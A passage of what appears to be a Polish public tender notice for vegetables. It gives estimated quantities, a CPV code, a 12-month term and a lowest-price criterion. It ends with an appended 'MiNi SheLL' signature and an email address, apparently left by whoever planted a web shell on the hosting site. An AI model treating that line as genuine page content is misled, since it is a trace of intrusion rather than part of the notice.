30	Fasolka szparagowa		50kg,
31	Kapusta biała		170kg,
32	Kapusta młoda		250 sztuk,
33	Kapusta czerwona		50kg,
34	Kapusta pekińska		60kg,
35	kalafior		150 sztuk,
36	Sałata 	170 sztuk,	
37	Rzodkiewka 	180 pęczków,	
38	Szczypior 		100 pęczków,
39	włoszczyzna		500 pęczków,
41	Pomidory 		700kg,
42	Ogórki zielone		250k,g
43	Pieczarki 		180kg,
44	Papryka 		50kg, 
45	Natka pietruszki		70 pęczków,
46	Koperek 		170 pęczków,
47	Botwina 		60 pęczków,
48	Szczaw 		15kg,
49	Czosnek 		50sztuk,
50	Mieszanka warzyw - mrożonka 450 g	150sztuk	

  * Podane w kolumnie ilość  wielkości produktów są wartościami szacunkowymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com